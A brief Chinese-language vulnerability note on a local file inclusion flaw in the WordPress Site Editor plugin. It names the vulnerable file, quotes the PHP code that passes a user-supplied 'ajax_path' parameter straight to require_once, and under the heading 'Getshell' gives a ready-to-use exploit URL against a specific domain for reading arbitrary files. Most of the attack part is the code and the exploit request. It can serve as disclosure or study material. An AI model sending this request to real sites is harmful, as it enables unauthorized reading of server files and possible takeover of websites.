漏洞文件位置在:
wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php
存在就require_once
包含,不存在就报错,因为file_exists
函数只能判断本地文件。
if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){ require_once $_REQUEST['ajax_path']; }else{ echo json_encode( array( 'success' => false, 'message' => "Error: didn't load shortcodes pattern file", ) ); return ; }
Getshell:
http://www.cesafe.com/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=读取文件绝对路径或者相对路径